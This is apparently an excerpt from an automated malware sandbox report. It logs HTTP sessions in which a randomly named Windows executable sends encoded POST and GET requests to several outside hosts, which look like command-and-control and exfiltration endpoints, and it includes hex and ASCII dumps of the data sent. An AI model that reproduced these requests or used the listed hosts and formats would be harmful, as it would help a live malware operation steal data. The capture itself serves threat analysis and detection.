                                                                                Data Raw: 50 4a 39 4c 3d 35 56 58 58 6f 43 50 6d 6c 7a 47 53 39 68 4e 44 44 64 43 39 51 33 78 67 41 4b 61 77 36 46 58 67 55 33 61 34 77 72 6e 4c 7a 7a 62 61 42 67 55 6a 6e 32 5a 34 73 47 71 68 4d 62 61 72 4d 53 36 6b 30 32 42 48 4b 71 77 57 72 34 6c 38 68 31 53 53 48 75 53 36 4e 51 62 73 42 7a 39 61 30 30 61 4a 77 4a 6f 30 45 54 4f 48 48 68 66 6d 51 54 39 37 47 67 34 2b 53 47 55 39 45 4b 66 34 6b 7a 42 4c 6d 43 6e 77 2f 35 68 44 74 6d 53 58 4a 79 66 54 30 58 52 36 37 38 51 2b 74 48 32 46 4d 74 68 4b 4a 45 70 76 69 78 4e 70 6a 38 71 50 5a 71 57 6d 72 6b 2b 72 54 74 4c 41 69 61 4a 34 55 6c 34 2f 4e 52 41 39 63 6c 75 47 54 44 56 76 6c 48 37 66 62 78 64 2b 47 76 61 74 57 41 46 55 76 47 4b 39 46 50 53 59 72 46 34 64 50 61 51 35 6a 4d 52 75 6c 55 51 53 6a 4c 53 77 52 47 55 55 47 70 5a 31 73 63 43 31 6a 33 52 72 58 30 61 2f 6d 76 6b 37 43 2f 4e 38 49 54 6d 36 6e 44 4d 44 5a 64 4d 6c 2b 35 63 5a 70 51 37 42 53 4b 35 37 67 41 33 57 53 67 56 55 73 66 76 52 48 73 45 2b 48 6a 61 6b 38 48 34 51 66 55 6b 46 56 59 5a 4e 58 [TRUNCATED]
                                                                                Data Ascii: PJ9L=5VXXoCPmlzGS9hNDDdC9Q3xgAKaw6FXgU3a4wrnLzzbaBgUjn2Z4sGqhMbarMS6k02BHKqwWr4l8h1SSHuS6NQbsBz9a00aJwJo0ETOHHhfmQT97Gg4+SGU9EKf4kzBLmCnw/5hDtmSXJyfT0XR678Q+tH2FMthKJEpvixNpj8qPZqWmrk+rTtLAiaJ4Ul4/NRA9cluGTDVvlH7fbxd+GvatWAFUvGK9FPSYrF4dPaQ5jMRulUQSjLSwRGUUGpZ1scC1j3RrX0a/mvk7C/N8ITm6nDMDZdMl+5cZpQ7BSK57gA3WSgVUsfvRHsE+Hjak8H4QfUkFVYZNXHVI6I/K7o+i8ECXd7OhO/UJjXyLGTuQh5JYzGaX4j7trPiNWfImQukfEuLDqf37ZXCBo64yfeXXH9q8zoH3JeKyHoOlkXQ57OP4qgE6j318AENoDI6wP2y3IYkgXSBYytw+39ikO6d/Toa8N8RfOQR69lKweyGDl6tX0ErAkX4GJLtQ3nFo/VsgLWL4AbuVCt1BKrjlUhZy+nBlviNLwAB3ueCXvzVXvDZT105oZ57r3fJrxBzSY0BiXdGB4fKOQoIfmJp6JI071jTQhMod4LuTUN154W9iAGFZxU5KGvVwfbBANH9aQXXjHoZPmpW8q5w53Ge/qCV7CFzPKF8qprIDAV2AsNhAMf99r8z0y1kOoR86aF5SWN4Z9mYEahXkmN7iPDri67oxDJEDfF5fvIZWA3HZ6wnnJRiY1aB9TGoysBCSl9b14xGVz20t/IpLeWbmTMO8huUKhuczxfob1uMK/1FuKtiQVMbsLjbjr2iBLhxi4dPaCvNdMcWC4Vj9CIxJshXJiiLYhG21rEkZJbO7Q2JBa8GW2MqKaIEQeIPiP7N+BXqVcAbO4V3PxXldnBWmhFqvPdwv7dJeGgoRqLL+HHl7guked3Yc+Lbf3uLFlWHjm2NgRFkKwD8gtJ71EIORr631hjGaVEpfSuDhIZ+dTKi/JyKe4oQ [TRUNCATED]
                                                                                Oct 10, 2024 14:40:30.861762047 CEST327INHTTP/1.1 405 Method Not Allowed
                                                                                Content-Type: text/html
                                                                                Date: Thu, 10 Oct 2024 12:40:30 GMT
                                                                                Server: openresty
                                                                                X-Cache: BYPASS
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.54999645.194.36.1280760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:32.443655968 CEST338OUTGET /nn3h/?PJ9L=0X/3r3PU8xeQ+UpzBpepRVcIT4+X7S/8fyuzw9u5zzT5DQpczFdmzE38B+SQag3b+0hUKu1k9LV6hnarOtmdXHDrfjsm00b18tkifTWDLiTHQlouOXMCIVM1BtqJliAH1Q==&2z=PtRhXbM HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.085bet.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:40:33.346507072 CEST1236INHTTP/1.1 200 OK
                                                                                Access-Control-Allow-Origin: *
                                                                                Content-Type: text/html
                                                                                Date: Thu, 10 Oct 2024 12:40:33 GMT
                                                                                Server: openresty
                                                                                Vary: Accept-Encoding
                                                                                X-Cache: BYPASS
                                                                                Connection: close
                                                                                Transfer-Encoding: chunked
                                                                                Data Raw: 31 66 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 20 64 61 74 61 2d 62 75 69 6c 64 74 69 6d 65 3d 22 37 2f 31 37 2f 32 30 32 34 2c 20 31 37 3a 33 39 3a 33 39 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 66 6f 6e 74 2d 70 72 65 63 6f 6e 6e 65 63 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 72 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 2d 43 4e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 [TRUNCATED]
                                                                                Data Ascii: 1f22<!DOCTYPE html><html lang="zh-CN" data-buildtime="7/17/2024, 17:39:39"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100% [TRUNCATED]
                                                                                Oct 10, 2024 14:40:33.346543074 CEST1236INData Raw: 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 63 6d 73 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 20 20
                                                                                Data Ascii: height: 100%; background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading {
                                                                                Oct 10, 2024 14:40:33.346582890 CEST1236INData Raw: 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 2c 0a 20 20 20 20 20 20 2e 61 6e 74 69 63 6f 6e 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 20 7b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f
                                                                                Data Ascii: .anticon-exclamation-circle, .anticon-check-circle { display: none !important; } .ant-message-error .anticon { background: #cf2f22 !important; color: white !important; border-radius: 16px;
                                                                                Oct 10, 2024 14:40:33.346615076 CEST1236INData Raw: 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 20 28 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 20 22 5f 54 5f 22 2c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 66 69 67 75 72 61
                                                                                Data Ascii: () : (t.defineProperty(t.prototype, "_T_", { configurable: !0, get: e, }), _T_)); })(Object); </script> <script> window.CONFIG={"name":"kc352-1","
                                                                                Oct 10, 2024 14:40:33.346633911 CEST1236INData Raw: 74 7c 31 39 32 2e 31 36 38 7c 31 32 37 2e 30 7c 31 37 32 2e 31 36 2e 38 7c 31 37 32 2e 31 36 2e 39 7c 63 6d 73 2e 2f 69 2e 74 65 73 74 28 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 44 45 42 55 47
                                                                                Data Ascii: t|192.168|127.0|172.16.8|172.16.9|cms./i.test(location.host); window.DEBUG = isHost; window.isMobile = isMobile; var isAgent = window.CONFIG && window.CONFIG.isAgent; var isMobileH5 = /\/m|\/m\//i.test(location.
                                                                                Oct 10, 2024 14:40:33.346649885 CEST836INData Raw: 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 67 65 74 52 65 67 69 73 74 72 61 74 69 6f 6e 73 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 20 28 72 65 67 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 72 65 67 20
                                                                                Data Ascii: or.serviceWorker.getRegistrations().then(function (regs) { for (var reg of regs) { reg .unregister() .then(function (registrationError) { console.error("service worker
                                                                                Oct 10, 2024 14:40:33.346671104 CEST1186INData Raw: 65 65 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 6d 73 2d 73 70 6f 72 74 73 2e 33 34 31 32 61 30 37 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20
                                                                                Data Ascii: eet"><link href="/css/cms-sports.3412a07e.css" rel="stylesheet"></head> <body> <noscript> <strong> We're sorry but doesn't work properly without JavaScript enabled. Please enable it to continue. </strong>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.5499973.33.130.19080760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:38.606635094 CEST598OUTPOST /cei6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rjscorp.org
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.rjscorp.org
                                                                                Referer: http://www.rjscorp.org/cei6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 39 68 4a 58 6f 76 77 47 6e 73 6b 61 71 41 47 6e 6e 72 67 77 7a 68 68 69 4a 74 7a 74 56 6d 52 66 54 35 79 74 4b 6e 65 5a 38 73 53 33 4e 43 34 68 57 66 4b 54 65 41 69 50 7a 67 4a 4d 64 31 74 32 54 42 74 6c 56 50 78 43 61 61 62 59 2f 54 50 6f 78 33 54 6f 4a 39 42 74 4e 42 75 6b 52 39 59 6e 6a 30 70 30 4a 73 41 77 36 44 2b 67 70 51 5a 48 55 32 66 7a 57 65 62 6b 30 76 71 32 31 59 71 68 35 66 79 66 37 32 6b 45 34 75 4b 65 6e 45 79 75 39 56 58 4f 63 75 4b 56 2f 2b 4b 6b 46 55 69 2f 2f 6f 37 77 56 76 67 5a 77 67 71 50 59 34 4e 4f 78 44 6b 36 6a 70 50 73 45 59 41 74 78 78 39 74 54 66 44 73 6b 69 45 3d
                                                                                Data Ascii: PJ9L=9hJXovwGnskaqAGnnrgwzhhiJtztVmRfT5ytKneZ8sS3NC4hWfKTeAiPzgJMd1t2TBtlVPxCaabY/TPox3ToJ9BtNBukR9Ynj0p0JsAw6D+gpQZHU2fzWebk0vq21Yqh5fyf72kE4uKenEyu9VXOcuKV/+KkFUi//o7wVvgZwgqPY4NOxDk6jpPsEYAtxx9tTfDskiE=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.5499983.33.130.19080760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:41.154865026 CEST618OUTPOST /cei6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rjscorp.org
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.rjscorp.org
                                                                                Referer: http://www.rjscorp.org/cei6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 39 68 4a 58 6f 76 77 47 6e 73 6b 61 70 67 32 6e 67 4d 4d 77 36 68 68 6c 4d 74 7a 74 63 47 51 55 54 35 2b 74 4b 6b 54 43 38 65 32 33 4e 6e 45 68 58 62 6d 54 51 67 69 50 37 41 4a 44 5a 31 74 48 54 42 52 58 56 4e 31 43 61 61 66 59 2f 52 48 6f 78 45 72 72 50 39 42 76 41 68 75 6d 65 64 59 6e 6a 30 70 30 4a 73 56 74 36 43 61 67 70 67 70 48 46 6e 66 30 49 4f 62 6a 7a 76 71 32 78 59 71 6c 35 66 79 74 37 79 6b 75 34 6f 4f 65 6e 46 43 75 39 45 58 4e 48 65 4b 54 69 75 4c 42 49 68 48 68 36 71 6a 6c 53 63 5a 62 77 47 69 6f 64 4f 67 6b 72 68 73 53 77 4a 6a 55 55 4c 49 61 67 42 63 45 4a 38 54 63 36 31 52 50 6e 49 79 4b 48 63 67 4f 59 63 33 4d 53 33 6f 67 53 72 4d 49
                                                                                Data Ascii: PJ9L=9hJXovwGnskapg2ngMMw6hhlMtztcGQUT5+tKkTC8e23NnEhXbmTQgiP7AJDZ1tHTBRXVN1CaafY/RHoxErrP9BvAhumedYnj0p0JsVt6CagpgpHFnf0IObjzvq2xYql5fyt7yku4oOenFCu9EXNHeKTiuLBIhHh6qjlScZbwGiodOgkrhsSwJjUULIagBcEJ8Tc61RPnIyKHcgOYc3MS3ogSrMI


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.5499993.33.130.19080760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:43.694454908 CEST1635OUTPOST /cei6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.rjscorp.org
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.rjscorp.org
                                                                                Referer: http://www.rjscorp.org/cei6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 39 68 4a 58 6f 76 77 47 6e 73 6b 61 70 67 32 6e 67 4d 4d 77 36 68 68 6c 4d 74 7a 74 63 47 51 55 54 35 2b 74 4b 6b 54 43 38 65 2b 33 4d 56 63 68 57 36 6d 54 52 67 69 50 6b 77 4a 41 5a 31 74 65 54 42 35 70 56 4e 35 53 61 59 58 59 2f 79 66 6f 7a 31 72 72 61 4e 42 76 4a 42 75 6e 52 39 59 58 6a 30 35 77 4a 73 46 74 36 43 61 67 70 69 78 48 46 32 66 30 50 2b 62 6b 30 76 71 36 31 59 71 42 35 66 71 39 37 79 6f 55 37 59 75 65 6e 6c 53 75 75 47 50 4e 61 75 4b 52 68 75 4c 6a 49 68 44 41 36 71 76 70 53 64 39 6c 77 42 75 6f 65 34 56 41 35 67 77 30 6d 76 76 34 47 59 45 38 77 6e 4a 6e 58 64 48 4f 6d 47 31 76 69 62 43 62 58 62 6b 71 4f 74 75 51 52 67 55 41 62 38 31 42 75 47 2f 54 2b 4a 69 36 4a 34 4d 54 75 72 68 31 39 71 4e 64 62 68 33 4b 6c 36 69 5a 70 63 59 56 67 65 74 71 6b 70 33 37 46 53 6d 6d 30 6c 75 6a 57 2f 55 59 37 72 48 68 4c 4b 54 52 41 62 35 31 6a 63 76 78 6b 6d 6a 34 49 72 6d 6e 4b 55 50 69 39 49 72 52 56 6c 48 48 44 4b 78 64 72 46 38 61 6b 4c 44 52 53 41 41 53 57 38 47 48 76 65 5a 4d 73 [TRUNCATED]
                                                                                Data Ascii: PJ9L=9hJXovwGnskapg2ngMMw6hhlMtztcGQUT5+tKkTC8e+3MVchW6mTRgiPkwJAZ1teTB5pVN5SaYXY/yfoz1rraNBvJBunR9YXj05wJsFt6CagpixHF2f0P+bk0vq61YqB5fq97yoU7YuenlSuuGPNauKRhuLjIhDA6qvpSd9lwBuoe4VA5gw0mvv4GYE8wnJnXdHOmG1vibCbXbkqOtuQRgUAb81BuG/T+Ji6J4MTurh19qNdbh3Kl6iZpcYVgetqkp37FSmm0lujW/UY7rHhLKTRAb51jcvxkmj4IrmnKUPi9IrRVlHHDKxdrF8akLDRSAASW8GHveZMsESFhCMzLB0nUfubatQLgD3z87Y52K60NSmfJ6uoTG89ikwTlC1rN7LyrDgh/GfoT36/uFe5XNBlyuzopduc43z7Cf4IDlWWf75jJoMwA7JhXJDYrQZTjvf5GW64BcgZjWVdJByh8IPYnc+77l3DRvpiebFZi/EIMwFUv9U8FhvVSMCDzwE4Z/fqe4q9XuZLJZcX8Lvxufnt4D4fJ3NZ1IGseVXtn+SRxTZEVjyKEtQx/7BnGoo5alfqLoeTFHZjvoZmklDA6qwAlQA3nxoUcQrWjpa0iectV63Un4knhsaXw8vQbuikg+QKOC7KL630fwCMTS/JOPzAh3e3pfiFECJGOt/eEuso/b+qUSUCeiZoR3pmAZC8ZfmfnCHr3UmxUSvkYqidgJ0htzCAVUxhaM8ScpW1w+FM9MOXb9JdJsnjFFyeNeacn9m5/wJ13NhfZyHuTx0vH22KxNrt3zcF4zU8RJPLnfyHuCiYmTjbA3KlaXIle02/oIfTCxCXpI/a7+mSpbaj9Tf1PMEO75HLvcIko/CGkuCA4WKEhU3FCzYzBu/7KmXgqP2/u1TCF/cRgEsRXFta8F8mNACkOK1fvOxVjLPhtUqP7yUET9limgzDdpEP+mh4fXF3rfYCWOO2U+TFNMkjOx9H6rjdLJKbpUguZt/O4rFtLjS [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.5500003.33.130.19080760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:40:46.269944906 CEST339OUTGET /cei6/?2z=PtRhXbM&PJ9L=wjh3rahD5O8YyXDPiPgI2jcIa9PhSWViTP6mKxO94t21NngHPpPWFw/W8Bs1fVklZglLQeYSd7bpiR31wlDzTqFVQD+LW583mR1Tetwe2kyAmXAyEFXhKtTdwvrG/oT0lA== HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.rjscorp.org
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Oct 10, 2024 14:40:46.748471975 CEST403INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Thu, 10 Oct 2024 12:40:46 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 263
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 7a 3d 50 74 52 68 58 62 4d 26 50 4a 39 4c 3d 77 6a 68 33 72 61 68 44 35 4f 38 59 79 58 44 50 69 50 67 49 32 6a 63 49 61 39 50 68 53 57 56 69 54 50 36 6d 4b 78 4f 39 34 74 32 31 4e 6e 67 48 50 70 50 57 46 77 2f 57 38 42 73 31 66 56 6b 6c 5a 67 6c 4c 51 65 59 53 64 37 62 70 69 52 33 31 77 6c 44 7a 54 71 46 56 51 44 2b 4c 57 35 38 33 6d 52 31 54 65 74 77 65 32 6b 79 41 6d 58 41 79 45 46 58 68 4b 74 54 64 77 76 72 47 2f 6f 54 30 6c 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2z=PtRhXbM&PJ9L=wjh3rahD5O8YyXDPiPgI2jcIa9PhSWViTP6mKxO94t21NngHPpPWFw/W8Bs1fVklZglLQeYSd7bpiR31wlDzTqFVQD+LW583mR1Tetwe2kyAmXAyEFXhKtTdwvrG/oT0lA=="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.55000185.159.66.9380760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:41:00.069731951 CEST625OUTPOST /tkqd/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.mudanya-nakliyat.xyz
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.mudanya-nakliyat.xyz
                                                                                Referer: http://www.mudanya-nakliyat.xyz/tkqd/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 74 49 66 77 50 7a 71 65 36 47 52 70 64 78 37 5a 77 73 70 46 6d 64 7a 61 36 64 65 69 5a 6e 39 2b 79 42 57 66 67 56 77 33 56 69 57 69 44 67 4d 6c 59 63 73 67 71 6f 47 7a 41 61 76 71 4b 2f 41 77 36 79 6c 31 51 30 32 2f 71 30 63 49 47 73 4e 46 76 2f 41 75 4a 57 63 4c 4c 63 74 61 47 77 39 75 62 38 72 51 4c 6f 69 51 33 33 44 4d 67 53 66 52 47 63 63 36 4a 51 6e 79 31 71 53 5a 47 75 59 58 47 33 45 67 34 37 77 4a 4a 65 6d 72 4d 38 75 47 50 56 44 49 35 58 36 2b 39 76 48 46 2f 2b 4f 4b 44 76 48 70 39 70 67 6f 68 54 55 44 66 75 41 46 33 42 46 30 79 71 78 59 4c 42 41 79 53 4a 50 5a 73 4b 30 61 2b 72 34 3d
                                                                                Data Ascii: PJ9L=tIfwPzqe6GRpdx7ZwspFmdza6deiZn9+yBWfgVw3ViWiDgMlYcsgqoGzAavqK/Aw6yl1Q02/q0cIGsNFv/AuJWcLLctaGw9ub8rQLoiQ33DMgSfRGcc6JQny1qSZGuYXG3Eg47wJJemrM8uGPVDI5X6+9vHF/+OKDvHp9pgohTUDfuAF3BF0yqxYLBAySJPZsK0a+r4=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.55000285.159.66.9380760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:41:02.635318041 CEST645OUTPOST /tkqd/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.mudanya-nakliyat.xyz
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.mudanya-nakliyat.xyz
                                                                                Referer: http://www.mudanya-nakliyat.xyz/tkqd/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
                                                                                Data Raw: 50 4a 39 4c 3d 74 49 66 77 50 7a 71 65 36 47 52 70 64 51 4c 5a 6a 2f 42 46 75 64 7a 5a 6a 74 65 69 43 58 39 45 79 41 71 66 67 51 41 64 55 52 79 69 44 42 38 6c 4a 70 59 67 72 6f 47 7a 50 36 76 72 58 50 41 42 36 79 70 58 51 31 36 2f 71 30 59 49 47 6f 46 46 76 4e 6f 78 49 47 63 4a 44 38 74 59 62 67 39 75 62 38 72 51 4c 6f 32 36 33 32 72 4d 67 69 50 52 45 39 63 35 58 67 6e 31 38 4b 53 5a 4d 4f 59 54 47 33 46 46 34 36 63 77 4a 64 53 72 4d 35 4b 47 65 6b 44 50 79 58 37 31 7a 50 47 6c 76 72 6e 69 42 64 37 76 31 4c 6f 68 39 41 51 61 65 59 74 76 74 6a 4e 63 68 4b 64 67 62 53 49 46 44 35 75 77 32 70 6b 71 67 38 73 61 67 31 43 78 2b 59 2f 2b 6f 6f 4e 53 52 66 46 42 78 66 50 68
                                                                                Data Ascii: PJ9L=tIfwPzqe6GRpdQLZj/BFudzZjteiCX9EyAqfgQAdURyiDB8lJpYgroGzP6vrXPAB6ypXQ16/q0YIGoFFvNoxIGcJD8tYbg9ub8rQLo2632rMgiPRE9c5Xgn18KSZMOYTG3FF46cwJdSrM5KGekDPyX71zPGlvrniBd7v1Loh9AQaeYtvtjNchKdgbSIFD5uw2pkqg8sag1Cx+Y/+ooNSRfFBxfPh


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.55000385.159.66.9380760C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 10, 2024 14:41:05.385277033 CEST1662OUTPOST /tkqd/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.mudanya-nakliyat.xyz
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Cache-Control: no-cache
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.mudanya-nakliyat.xyz
                                                                                Referer: http://www.mudanya-nakliyat.xyz/tkqd/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/40.1
